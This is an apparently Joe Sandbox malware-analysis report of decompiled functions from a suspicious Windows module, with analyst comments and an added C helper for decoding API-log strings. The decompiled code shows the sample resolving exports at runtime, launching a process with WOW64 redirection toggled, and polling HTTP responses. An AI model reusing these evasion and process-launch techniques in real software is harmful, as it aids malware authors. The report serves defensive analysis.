                                                    					 *_t174(_v4, _v24);
                                                    					_t175 = E01094881( *_t174(_v12, _t168), _v20);
                                                    					_v36 = _t175;
                                                    					if(_t175 == 0) {
                                                    						_v8 = 8;
                                                    						L25:
                                                    						E01091103();
                                                    						L26:
                                                    						HeapFree( *0x109a2d8, 0, _v40);
                                                    						_t172 = 0;
                                                    						goto L27;
                                                    					}
                                                    					_t118 = E01093967(_t152, 0xffffffffffffffff, _t168,  &_v24);
                                                    					_v12 = _t118;
                                                    					if(_t118 == 0) {
                                                    						_t178 = _v24;
                                                    						_v20 = E01094EF8(_t178, _t175, _v16, _v12);
                                                    						_t126 =  *((intOrPtr*)(_t178 + 8));
                                                    						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
                                                    						_t128 =  *((intOrPtr*)(_t178 + 8));
                                                    						 *((intOrPtr*)( *_t128 + 8))(_t128);
                                                    						_t130 =  *((intOrPtr*)(_t178 + 4));
                                                    						 *((intOrPtr*)( *_t130 + 8))(_t130);
                                                    						_t132 =  *_t178;
                                                    						 *((intOrPtr*)( *_t132 + 8))(_t132);
                                                    						E0109692B(_t178);
                                                    					}
                                                    					if(_v8 != 0x10d2) {
                                                    						L20:
                                                    						if(_v8 == 0) {
                                                    							_t120 = _v16;
                                                    							if(_t120 != 0) {
                                                    								_t121 =  *_t120;
                                                    								_t176 =  *_v12;
                                                    								_v16 = _t121;
                                                    								wcstombs(_t121, _t121,  *_v12);
                                                    								 *_v24 = E01092DA0(_v16, _v16, _t176 >> 1);
                                                    							}
                                                    						}
                                                    						goto L23;
                                                    					} else {
                                                    						if(_v16 != 0) {
                                                    							L23:
                                                    							E0109692B(_v32);
                                                    							if(_v12 == 0 || _v8 == 0x10d2) {
                                                    								goto L26;
                                                    							} else {
                                                    								goto L25;
                                                    							}
                                                    						}
                                                    						_v8 = _v8 & 0x00000000;
                                                    						goto L20;
                                                    					}
                                                    				}
                                                    			}

                                                    Instruction addresses: the per-line address column of this listing (one address per C-code line, 0x00000000 for the goto lines) was flattened by extraction and is not shown; the function's code spans 0x01091910 to 0x01091C7E in the dumped module.

                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 01091927
                                                    • wsprintfA.USER32 ref: 01091974
                                                    • wsprintfA.USER32 ref: 01091991
                                                    • wsprintfA.USER32 ref: 010919B3
                                                    • wsprintfA.USER32 ref: 010919DA
                                                    • wsprintfA.USER32 ref: 010919FB
                                                    • wsprintfA.USER32 ref: 01091A26
                                                    • HeapFree.KERNEL32(00000000,?), ref: 01091A39
                                                    • wsprintfA.USER32 ref: 01091A58
                                                    • HeapFree.KERNEL32(00000000,?), ref: 01091A69
                                                      • Part of subcall function 01093A89: RtlEnterCriticalSection.NTDLL(01B095C0), ref: 01093AA5
                                                      • Part of subcall function 01093A89: RtlLeaveCriticalSection.NTDLL(01B095C0), ref: 01093AC3
                                                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01091A98
                                                    • GetTickCount.KERNEL32 ref: 01091AAA
                                                    • RtlEnterCriticalSection.NTDLL(01B095C0), ref: 01091ABE
                                                    • RtlLeaveCriticalSection.NTDLL(01B095C0), ref: 01091ADC
                                                      • Part of subcall function 0109581D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,0109384E,00000000,01B09600), ref: 01095848
                                                      • Part of subcall function 0109581D: lstrlen.KERNEL32(00000000,?,775EC740,0109384E,00000000,01B09600), ref: 01095850
                                                      • Part of subcall function 0109581D: strcpy.NTDLL ref: 01095867
                                                      • Part of subcall function 0109581D: lstrcat.KERNEL32(00000000,00000000), ref: 01095872
                                                      • Part of subcall function 0109581D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,0109384E,?,775EC740,0109384E,00000000,01B09600), ref: 0109588F
                                                    • StrTrimA.SHLWAPI(00000000,01099280,?,01B09600), ref: 01091B0E
                                                      • Part of subcall function 010911A3: lstrlen.KERNEL32(01B09BD0,00000000,00000000,00000000,01093879,00000000), ref: 010911B3
                                                      • Part of subcall function 010911A3: lstrlen.KERNEL32(?), ref: 010911BB
                                                      • Part of subcall function 010911A3: lstrcpy.KERNEL32(00000000,01B09BD0), ref: 010911CF
                                                      • Part of subcall function 010911A3: lstrcat.KERNEL32(00000000,?), ref: 010911DA
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 01091B31
                                                    • lstrcpy.KERNEL32(?,?), ref: 01091B3B
                                                    • lstrcat.KERNEL32(?,?), ref: 01091B4B
                                                    • lstrcat.KERNEL32(?,00000000), ref: 01091B52
                                                      • Part of subcall function 01094881: lstrlen.KERNEL32(?,00000000,01B09DD8,00000000,0109166A,01B09FFB,69B25F44,?,?,?,?,69B25F44,00000005,0109A00C,4D283A53,?), ref: 01094888
                                                      • Part of subcall function 01094881: mbstowcs.NTDLL ref: 010948B1
                                                      • Part of subcall function 01094881: memset.NTDLL ref: 010948C3
                                                    • wcstombs.NTDLL ref: 01091BF5
                                                      • Part of subcall function 01094EF8: SysAllocString.OLEAUT32(?), ref: 01094F33
                                                      • Part of subcall function 0109692B: RtlFreeHeap.NTDLL(00000000,00000000,01093092,00000000,?,00000000,00000000), ref: 01096937
                                                    • HeapFree.KERNEL32(00000000,?), ref: 01091C3E
                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01091C4A
                                                    • HeapFree.KERNEL32(00000000,?,?,01B09600), ref: 01091C57
                                                    • HeapFree.KERNEL32(00000000,?), ref: 01091C64
                                                    • HeapFree.KERNEL32(00000000,?), ref: 01091C6E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
                                                    • String ID: Uqt
                                                    • API String ID: 1185349883-2320327147
                                                    • Opcode ID: ce93f0cff4340a6a3377a5d87c2ab69322b7f90f4399c68339c0ebe34f1a8354
                                                    • Instruction ID: 7c1a22dba371b38707cdaff8f9d36aa1251e3320af372db91f3a0c875f949264
                                                    • Opcode Fuzzy Hash: ce93f0cff4340a6a3377a5d87c2ab69322b7f90f4399c68339c0ebe34f1a8354
                                                    • Instruction Fuzzy Hash: 39A19D71604215EFCB619F68DCA8E9A7BE8FF88364F044968F4C8D7260CB3AD845DB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 73%
                                                    			E01097066(void* __eax, void* __ecx) {
                                                    				long _v8;
                                                    				char _v12;
                                                    				void* _v16;
                                                    				void* _v28;
                                                    				long _v32;
                                                    				void _v104;
                                                    				char _v108;
                                                    				long _t36;
                                                    				intOrPtr _t40;
                                                    				intOrPtr _t47;
                                                    				intOrPtr _t50;
                                                    				void* _t58;
                                                    				void* _t68;
                                                    				intOrPtr* _t70;
                                                    				intOrPtr* _t71;
                                                    
                                                    				_t1 = __eax + 0x14; // 0x74183966
                                                    				_t69 =  *_t1;
                                                     				_t36 = E0109151D(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // E0109151D resolves ntdll exports by name (GetModuleHandleA "NTDL...", GetProcAddress "ZwCr...", "ZwMa...", "ZwUn...", "RtlN...", "ZwCl..."; see the APIs list) and hands back a callable in _v12 and a context in _v16
                                                    				_v8 = _t36;
                                                    				if(_t36 != 0) {
                                                    					L12:
                                                    					return _v8;
                                                    				}
                                                    				E010979F1( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                    				_t40 = _v12(_v12);
                                                    				_v8 = _t40;
                                                     				if(_t40 == 0 && ( *0x109a300 & 0x00000001) != 0) { // only when the call succeeded and bit 0 of the global flag word at 0x109a300 is set
                                                    					_v32 = 0;
                                                    					asm("stosd");
                                                    					asm("stosd");
                                                    					asm("stosd");
                                                    					_v108 = 0;
                                                    					memset( &_v104, 0, 0x40);
                                                    					_t47 =  *0x109a348; // 0xa6d5a8
                                                     					_t18 = _t47 + 0x109b3f3; // 0x73797325 = "%sys" in little-endian ASCII: an environment-variable template that E01096F67 expands with ExpandEnvironmentStringsA (see APIs)
                                                    					_t68 = E01096F67(_t18);
                                                    					if(_t68 == 0) {
                                                     						_v8 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                                    					} else {
                                                    						_t50 =  *0x109a348; // 0xa6d5a8
                                                    						_t19 = _t50 + 0x109b73f; // 0x1b08ce7
                                                     						_t20 = _t50 + 0x109b0af; // 0x4e52454b = "KERN": module name passed to GetModuleHandleA (the log shows only the first four bytes of the string)
                                                     						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19); // runtime resolution of a kernel32 export; its name is at _t19 and is not visible in the dump
                                                    						if(_t71 == 0) {
                                                     							_v8 = 0x7f; // ERROR_PROC_NOT_FOUND
                                                    						} else {
                                                     							_v108 = 0x44; // cb = 0x44 = sizeof(STARTUPINFOA); together with the 0x40 zeroed bytes above this is a zero-initialised STARTUPINFOA (analyst inference from the size and the call below)
                                                     							E01091897(); // E01091897 resolves a kernel32 export whose name begins "Wow6" (0x36776F57 in the APIs list), i.e. it toggles WOW64 file-system redirection around the call (analyst inference)
                                                     							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // argument layout of CreateProcessA: lpCommandLine = expanded path _t68, dwCreationFlags 0x04000000 = CREATE_DEFAULT_ERROR_MODE, lpStartupInfo = &_v108, lpProcessInformation = &_v32 (analyst inference; the eleventh argument does not belong to that prototype and is likely a decompiler artefact)
                                                    							_push(1);
                                                     							E01091897(); // second call, with the argument 1 pushed above: restores the previous redirection state (analyst inference)
                                                    							if(_t58 == 0) {
                                                    								_v8 = GetLastError();
                                                    							} else {
                                                     								CloseHandle(_v28); // hThread (analyst inference: handles of a PROCESS_INFORMATION that starts at &_v32)
                                                     								CloseHandle(_v32); // hProcess
                                                    							}
                                                    						}
                                                     						HeapFree( *0x109a2d8, 0, _t68); // free the expanded path; the heap handle is kept in the global at 0x109a2d8
                                                    					}
                                                    				}
                                                    				_t70 = _v16;
                                                     				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70)); // tear-down through two function pointers stored in the _v16 context (analyst inference: the ntdll exports resolved by E0109151D)
                                                     				E0109692B(_t70); // E0109692B frees a heap block via RtlFreeHeap (see its entry in the APIs list of E010959B3)
                                                    				goto L12;
                                                    			}

                                                    APIs
                                                      • Part of subcall function 0109151D: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,01097082,?,?,?,?,00000000,00000000), ref: 01091542
                                                      • Part of subcall function 0109151D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 01091564
                                                      • Part of subcall function 0109151D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0109157A
                                                      • Part of subcall function 0109151D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 01091590
                                                      • Part of subcall function 0109151D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 010915A6
                                                      • Part of subcall function 0109151D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 010915BC
                                                    • memset.NTDLL ref: 010970D0
                                                      • Part of subcall function 01096F67: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,010970E9,73797325), ref: 01096F78
                                                      • Part of subcall function 01096F67: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 01096F92
                                                    • GetModuleHandleA.KERNEL32(4E52454B,01B08CE7,73797325), ref: 01097106
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0109710D
                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 01097175
                                                      • Part of subcall function 01091897: GetProcAddress.KERNEL32(36776F57,01095FDD), ref: 010918B2
                                                    • CloseHandle.KERNEL32(00000000,00000001), ref: 01097152
                                                    • CloseHandle.KERNEL32(?), ref: 01097157
                                                    • GetLastError.KERNEL32(00000001), ref: 0109715B
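The API log above prints pointer arguments as the first four bytes of the pointed-to buffer, shown as a little-endian DWORD: `GetModuleHandleA.KERNEL32(4C44544E, ...)` is a lookup of a module whose name starts "NTDL", the `GetProcAddress` calls with `7243775A`, `614D775A`, `6E55775A`, `4E6C7452` and `6C43775A` resolve exports beginning "ZwCr", "ZwMa", "ZwUn", "RtlN" and "ZwCl", `73797325` is the "%sys" environment template and `36776F57` is the "Wow6" prefix of the redirection API. The helper below is added here as an example and is not code from the Joe Sandbox report or from the sample: it decodes such tokens and annotates a whole log line. The log lines embedded in `main` are copied from the APIs list above; the three-character threshold for treating a DWORD as text is a choice of this example.

```c
/*
 * Decode Joe Sandbox API-log arguments that are really the first four bytes
 * of a string, e.g. 4C44544E -> "NTDL", 4E52454B -> "KERN".
 * Added example; not part of the report or of the analysed sample.
 */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MIN_CHARS 3   /* example's own threshold: shorter hits are treated as integers */

/* Decode one DWORD, low byte first, stopping at the first NUL or
 * non-printable byte. Writes at most 4 characters plus NUL into out and
 * returns the number of characters decoded (0..4). */
static int decode_dword_prefix(uint32_t v, char out[5]) {
    int n = 0;
    for (int i = 0; i < 4; i++) {
        unsigned char c = (unsigned char)((v >> (8 * i)) & 0xff);
        if (c == 0 || !isprint(c))
            break;
        out[n++] = (char)c;
    }
    out[n] = '\0';
    return n;
}

/* Parse exactly eight hex digits (the report's argument format); returns 1 on
 * success, 0 for "?" placeholders or anything else. */
static int parse_hex_dword(const char *s, size_t len, uint32_t *out) {
    if (len != 8)
        return 0;
    uint32_t v = 0;
    for (size_t i = 0; i < 8; i++) {
        unsigned char c = (unsigned char)s[i];
        int d;
        if (c >= '0' && c <= '9')      d = c - '0';
        else if (c >= 'A' && c <= 'F') d = c - 'A' + 10;
        else if (c >= 'a' && c <= 'f') d = c - 'a' + 10;
        else return 0;
        v = (v << 4) | (uint32_t)d;
    }
    *out = v;
    return 1;
}

/* Annotate one log line of the form  Api.MODULE(arg,arg,...), ref: ADDR.
 * Every argument that decodes to at least MIN_CHARS printable characters is
 * appended to out as TOKEN="text", space separated. Returns the number of
 * arguments annotated, or -1 if the line has no argument list or out is too
 * small. */
int annotate_log_line(const char *line, char *out, size_t outlen) {
    const char *open = strchr(line, '(');
    const char *close = open ? strrchr(open, ')') : NULL;
    if (!open || !close || outlen == 0)
        return -1;
    out[0] = '\0';
    size_t used = 0;
    int count = 0;
    const char *p = open + 1;
    while (p < close) {
        const char *end = memchr(p, ',', (size_t)(close - p));
        if (!end)
            end = close;
        uint32_t v;
        char text[5];
        if (parse_hex_dword(p, (size_t)(end - p), &v) &&
            decode_dword_prefix(v, text) >= MIN_CHARS) {
            int w = snprintf(out + used, outlen - used, "%s%.*s=\"%s\"",
                             count ? " " : "", (int)(end - p), p, text);
            if (w < 0 || (size_t)w >= outlen - used)
                return -1;            /* truncated */
            used += (size_t)w;
            count++;
        }
        p = end + 1;
    }
    return count;
}

int main(void) {
    /* Lines copied from the APIs list of E01097066 and its subcalls. */
    static const char *lines[] = {
        "GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,01097082,?,?,?,?,00000000,00000000), ref: 01091542",
        "GetProcAddress.KERNEL32(00000000,7243775A), ref: 01091564",
        "ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,010970E9,73797325), ref: 01096F78",
        "GetModuleHandleA.KERNEL32(4E52454B,01B08CE7,73797325), ref: 01097106",
        "GetProcAddress.KERNEL32(36776F57,01095FDD), ref: 010918B2",
    };
    char out[256];
    for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++) {
        int n = annotate_log_line(lines[i], out, sizeof out);
        printf("%s\n    -> %d string argument(s): %s\n", lines[i], n, out);
    }
    return 0;
}
```

Run on the five lines embedded in `main`, the output identifies "NTDL", "ZwCr", "%sys", "KERN" and "Wow6" while leaving genuine integers such as `00000020` and return addresses such as `01097082` alone; applying it to a whole APIs list is a quick way to see which modules and exports a function resolves at runtime before reading its decompiled body.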
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                     • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                    • String ID: Uqt$@MqtNqt
                                                    • API String ID: 3075724336-3266969629
                                                    • Opcode ID: 07cf04a76a489fda26687e396d3ac0fb26002892cd29fe3477ab4a3304eab1f2
                                                    • Instruction ID: eceb90b41c48358a8e80336fb6bfab8b6a5640c2863cdc49ce3a577074c89343
                                                    • Opcode Fuzzy Hash: 07cf04a76a489fda26687e396d3ac0fb26002892cd29fe3477ab4a3304eab1f2
                                                    • Instruction Fuzzy Hash: 83314DB2900209BFDF20AFA8DC98DDEBBBDFB48254F004469F685A7110D7359944DF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E010959B3(void* __ecx, void* __esi) {
                                                    				long _v8;
                                                    				long _v12;
                                                    				long _v16;
                                                    				long _v20;
                                                    				long _t34;
                                                    				long _t39;
                                                    				long _t42;
                                                    				long _t56;
                                                    				void* _t58;
                                                    				void* _t59;
                                                    				void* _t61;
                                                    
                                                    				_t61 = __esi;
                                                    				_t59 = __ecx;
                                                    				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                    				do {
                                                     					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0); // zero-timeout poll of the event at this+0x1c; 0 (WAIT_OBJECT_0) means it is already signalled
                                                    					_v20 = _t34;
                                                    					if(_t34 != 0) {
                                                    						L3:
                                                    						_v8 = 4;
                                                    						_v16 = 0;
                                                     						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) { // 0x20000013 = HTTP_QUERY_FLAG_NUMBER | HTTP_QUERY_STATUS_CODE: store the numeric status code at this+0x2c
                                                    							_t39 = GetLastError();
                                                    							_v12 = _t39;
                                                     							if(_v20 == 0 || _t39 != 0x2ef3) { // return the error unless the event is still unsignalled and the error is 0x2ef3 = ERROR_INTERNET_INCORRECT_HANDLE_STATE (12019, request not complete yet); in that case wait and retry
                                                    								L15:
                                                    								return _v12;
                                                    							} else {
                                                    								goto L11;
                                                    							}
                                                    						}
                                                    						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                                                    							goto L11;
                                                    						} else {
                                                    							_v16 = 0;
                                                    							_v8 = 0;
                                                     							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16); // 0x16 = HTTP_QUERY_RAW_HEADERS_CRLF with a NULL buffer: fails with ERROR_INSUFFICIENT_BUFFER and leaves the required size in _v8
                                                     							_t58 = E01096A51(_v8 + 1); // heap-allocate size + 1 for the terminating NUL
                                                    							if(_t58 == 0) {
                                                     								_v12 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                                    							} else {
                                                     								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) { // second call fills the buffer with the raw CRLF-separated response headers
                                                    									E0109692B(_t58);
                                                    									_v12 = GetLastError();
                                                    								} else {
                                                     									 *((char*)(_t58 + _v8)) = 0; // NUL-terminate the header block
                                                     									 *(_t61 + 0xc) = _t58; // keep the headers at this+0xc for the caller
                                                    								}
                                                    							}
                                                    							goto L15;
                                                    						}
                                                    					}
                                                    					SetEvent( *(_t61 + 0x1c));
                                                    					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                    					_v12 = _t56;
                                                    					if(_t56 != 0) {
                                                    						goto L15;
                                                    					}
                                                    					goto L3;
                                                    					L11:
                                                     					_t42 = E010917ED( *(_t61 + 0x1c), _t59, 0xea60); // wait up to 0xea60 = 60000 ms (WaitForMultipleObjects on the event and a second object, see APIs); 0 means poll again
                                                    					_v12 = _t42;
                                                    				} while (_t42 == 0);
                                                    				goto L15;
                                                    			}

                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,747581D0,00000000,00000000), ref: 010959CA
                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,010938B4,00000000,?), ref: 010959DA
                                                    • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 01095A0C
                                                    • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 01095A31
                                                    • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 01095A51
                                                    • GetLastError.KERNEL32 ref: 01095A63
                                                      • Part of subcall function 010917ED: WaitForMultipleObjects.KERNEL32(00000002,01097B88,00000000,01097B88,?,?,?,01097B88,0000EA60), ref: 01091808
                                                      • Part of subcall function 0109692B: RtlFreeHeap.NTDLL(00000000,00000000,01093092,00000000,?,00000000,00000000), ref: 01096937
                                                    • GetLastError.KERNEL32(00000000), ref: 01095A98
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                     • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                    • String ID: @MqtNqt
                                                    • API String ID: 3369646462-2883916605
                                                    • Opcode ID: bddc535aa05811c63cf6744ae6280772f7900801139b5961431016448ed589b9
                                                    • Instruction ID: fbe974a1bf1f9abe6cf0652ba18800550d7e2ad74b35efeb2273b29f0dcd1ce0
                                                    • Opcode Fuzzy Hash: bddc535aa05811c63cf6744ae6280772f7900801139b5961431016448ed589b9
                                                    • Instruction Fuzzy Hash: 4D3110B5D00309EFDF21DFA6CCD499EBBF8FB08314F1049AAE68292145D6359A45EF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 43%
                                                    			E01096DB6(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				intOrPtr _v16;
                                                    				char _v20;
                                                    				intOrPtr _v24;
                                                    				signed int _v28;
                                                    				intOrPtr _v32;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				intOrPtr _t58;
                                                    				signed int _t60;
                                                    				signed int _t62;
                                                    				intOrPtr _t64;
                                                    				intOrPtr _t66;
                                                    				intOrPtr _t70;
                                                    				void* _t72;
                                                    				void* _t75;
                                                    				void* _t76;
                                                    				intOrPtr _t80;
                                                    				WCHAR* _t83;
                                                    				void* _t84;
                                                    				void* _t85;
                                                    				void* _t86;
                                                    				intOrPtr _t92;
                                                    				intOrPtr* _t102;
                                                    				signed int _t103;
                                                    				void* _t104;
                                                    				intOrPtr _t105;
                                                    				void* _t107;
                                                    				intOrPtr* _t115;
                                                    				void* _t119;
                                                    				intOrPtr _t125;
                                                    
                                                    				_t58 =  *0x109a3dc; // 0x1b09c80
                                                    				_v24 = _t58;
                                                     				_v28 = 8; // default return code ERROR_NOT_ENOUGH_MEMORY, cleared to 0 only on success
                                                     				_v20 = GetTickCount(); // passed to E01094A9D below
                                                    				_t60 = E01091E6D();
                                                    				_t103 = 5;
                                                     				_t98 = _t60 % _t103 + 6; // E01091E6D() % 5 + 6: a length between 6 and 10
                                                    				_t62 = E01091E6D();
                                                     				_t117 = _t62 % _t103 + 6; // second independent length in 6..10
                                                     				_v32 = _t62 % _t103 + 6;
                                                     				_t64 = E01095B1A(_t60 % _t103 + 6); // E01095B1A(len) returns a heap string of that length (freed with E0109692B below)
                                                    				_v16 = _t64;
                                                    				if(_t64 != 0) {
                                                    					_t66 = E01095B1A(_t117);
                                                    					_v12 = _t66;
                                                    					if(_t66 != 0) {
                                                    						_push(5);
                                                    						_t104 = 0xa;
                                                    						_t119 = E01094A9D(_t104,  &_v20);
                                                    						if(_t119 == 0) {
                                                     							_t119 = 0x109918c; // fallback constant string when E01094A9D returns nothing
                                                    						}
                                                    						_t70 = E010967CE(_v24);
                                                    						_v8 = _t70;
                                                    						if(_t70 != 0) {
                                                     							_t115 = __imp__; // import the decompiler could not name; used like a string-length function in the size computations below (lstrlenW handles the wide strings)
                                                    							_t72 =  *_t115(_t119);
                                                    							_t75 =  *_t115(_v8);
                                                    							_t76 =  *_t115(_a4);
                                                     							_t80 = E01096A51(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76); // 2 * (component lengths + 0xbc): two bytes per character for a wide-char output buffer (analyst inference)
                                                    							_v24 = _t80;
                                                    							if(_t80 != 0) {
                                                    								_t105 =  *0x109a348; // 0xa6d5a8
                                                    								_t102 =  *0x109a138; // 0x1097d1e
                                                     								_t28 = _t105 + 0x109bb08; // 0x530025 = L"%S...": a wide format string whose first directive is %S
                                                     								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8); // *0x109a138 is a printf-style formatter (wsprintfW-like, analyst inference) writing the selected string _t119, the two random-length tokens _v16/_v12, _a4, _v8 and _a8 into _t80
                                                    								_push(4);
                                                    								_t107 = 5;
                                                    								_t83 = E01094A9D(_t107,  &_v20);
                                                    								_a8 = _t83;
                                                    								if(_t83 == 0) {
                                                     									_a8 = 0x1099190; // fallback constant string
                                                    								}
                                                    								_t84 =  *_t115(_a8);
                                                    								_t85 =  *_t115(_v8);
                                                    								_t86 =  *_t115(_a4);
                                                     								_t125 = E01096A51(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a); // second output buffer: 2 * (component lengths) + 0x13a
                                                    								if(_t125 == 0) {
                                                    									E0109692B(_v24);
                                                    								} else {
                                                    									_t92 =  *0x109a348; // 0xa6d5a8
                                                    									_t44 = _t92 + 0x109bc80; // 0x73006d
                                                    									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
                                                    									 *_a16 = _v24;
                                                    									_v28 = _v28 & 0x00000000;
                                                    									 *_a20 = _t125;
                                                    								}
                                                    							}
                                                    							E0109692B(_v8);
                                                    						}
                                                    						E0109692B(_v12);
                                                    					}
                                                    					E0109692B(_v16);
                                                    				}
                                                    				return _v28;
                                                    			}

                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 01096DCE
                                                    • lstrlen.KERNEL32(00000000,00000005), ref: 01096E4F
                                                    • lstrlen.KERNEL32(?), ref: 01096E60
                                                    • lstrlen.KERNEL32(00000000), ref: 01096E67
                                                    • lstrlenW.KERNEL32(80000002), ref: 01096E6E
                                                    • lstrlen.KERNEL32(?,00000004), ref: 01096ED7
                                                    • lstrlen.KERNEL32(?), ref: 01096EE0
                                                    • lstrlen.KERNEL32(?), ref: 01096EE7
                                                    • lstrlenW.KERNEL32(?), ref: 01096EEE
                                                      • Part of subcall function 0109692B: RtlFreeHeap.NTDLL(00000000,00000000,01093092,00000000,?,00000000,00000000), ref: 01096937
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$CountFreeHeapTick
                                                    • String ID:
                                                    • API String ID: 2535036572-0
                                                    • Opcode ID: 7a62f9c0a8ca0e8d1f9d9bf147bcb06dc5d2cd57a170ff77f7394dec323801e7
